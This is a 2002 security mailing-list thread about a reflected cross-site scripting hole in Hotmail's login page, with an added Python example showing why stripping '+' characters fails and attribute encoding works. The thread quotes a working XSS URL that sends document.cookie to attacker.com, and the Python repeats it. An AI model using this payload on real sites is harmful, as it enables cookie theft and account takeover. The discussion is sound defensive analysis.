Hello, comments below:

On Mon, 7 Oct 2002, Thor Larholm wrote:

> It's very simple, you can inject arbitrary scripting to be executed by the
> user in the context of hotmail. This means that you can e.g. steal his
> cookies or, if he's logged in, write emails from his account, delete his
> mails and change his password.

I'm not sure this is the case (severity)... Hotmail strips +'s and %2B's
from GET requests. While you can view your own cookies easily, I'm not sure
if you can still exploit this bug. I do know filtering these characters
prevents this sort of attack:

http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1&cb="><script>document.location.replace('http://attacker.com/steal.cgi?'+document.cookie);</script>&ct=1033054530&_setlang=

Is there another way to exploit this which I am not seeing? Or does MSN
actually have their act together (in this particular case...)?

-Russell

P.S. Well, I suppose the real question may be this: Is there a way to
concatenate javascript strings without "+" or "%2B"?

On Mon, 7 Oct 2002, Thor Larholm wrote:

> > From: Peter Rdam [mailto:hell@weedmail.com]
> > They didn't react, and I'm pretty curious about what
> > is possible with the bug. And I actually hope that
> > someone can tell me about it and maybe Microsoft will
> > do something about it..
>
> It's very simple, you can inject arbitrary scripting to be executed by the
> user in the context of hotmail. This means that you can e.g. steal his
> cookies or, if he's logged in, write emails from his account, delete his
> mails and change his password.
>
> Regards
> Thor Larholm
> Jubii A/S - Internet Programmer
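The thread turns on whether a filter that strips "+" and "%2B" from the request is enough to neutralise the reflection of the `cb` parameter. The following Python is an added example, not code from the thread, from Hotmail or from Microsoft; it models that reflection with an assumed page template (the thread only says the value is echoed into the login page, not what the surrounding markup is) and contrasts three server-side treatments of the value: no treatment, the character filter Russell describes, and contextual HTML-attribute encoding. The function names, the `TEMPLATE` string and the `audit()` helper are mine.

```python
# Added example (not from the thread, Hotmail or Microsoft): why dropping
# '+' / '%2B' from a reflected value is not a fix, and what is.
import html
import re
from urllib.parse import unquote, urlsplit

# The URL Russell quotes; the injected markup sits in the `cb` parameter.
THREAD_URL = (
    "http://lc2.law5.hotmail.passport.com/cgi-bin/login?_lang=&id=2&fs=1"
    "&cb=\"><script>document.location.replace('http://attacker.com/steal.cgi?'"
    "+document.cookie);</script>&ct=1033054530&_setlang="
)

# Assumed page template: the value lands inside a double-quoted attribute.
TEMPLATE = '<input type="hidden" name="cb" value="%s">'


def query_param(url, name):
    """Return one query value as the CGI would see it. parse_qs() is
    avoided on purpose: it turns '+' into a space, and the thread is
    about literal '+' characters surviving into the page."""
    for pair in urlsplit(url).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return ""


def render_raw(cb):
    """No treatment: the reflection the thread describes."""
    return TEMPLATE % cb


def strip_plus(cb):
    """The character filter Russell says Hotmail applies: '+' and '%2B'
    are dropped (after URL decoding, %2B has already become '+')."""
    return cb.replace("+", "").replace("%2B", "")


def render_stripped(cb):
    """Reflection after the character filter."""
    return TEMPLATE % strip_plus(cb)


def render_escaped(cb):
    """Contextual output encoding: every character with meaning inside an
    attribute value (quotes, angle brackets, ampersand) becomes an entity,
    so the value can never close the attribute or open a tag."""
    return TEMPLATE % html.escape(cb, quote=True)


def attribute_value(rendered):
    """What a browser takes as the attribute's value: the text up to the
    first unescaped double quote, with entities decoded."""
    m = re.search(r'value="([^"]*)"', rendered)
    return html.unescape(m.group(1)) if m else None


def injects_script(rendered):
    """True if a <script> start tag ended up in the markup itself."""
    return "<script" in rendered


def audit(cb):
    """Compare the three treatments for one reflected value."""
    return {
        "raw": injects_script(render_raw(cb)),
        "stripped": injects_script(render_stripped(cb)),
        "escaped": injects_script(render_escaped(cb)),
    }


if __name__ == "__main__":
    cb = query_param(THREAD_URL, "cb")
    for name, rendered in (("raw", render_raw(cb)),
                           ("stripped", render_stripped(cb)),
                           ("escaped", render_escaped(cb))):
        print(f"{name:9s} script tag in markup: {injects_script(rendered)!s:5s} "
              f"attribute value seen by browser: {attribute_value(rendered)!r}")
```

Running it shows the point of the thread from the defender's side: with the raw and the "+"-stripped renderings the attribute value the browser sees is empty and a `<script>` element has become part of the page, so the filter only damages one idiom inside the injected script rather than the injection itself; with attribute encoding the script tag never exists and `attribute_value()` returns the original `cb` string intact, so the application still receives its own parameter unchanged.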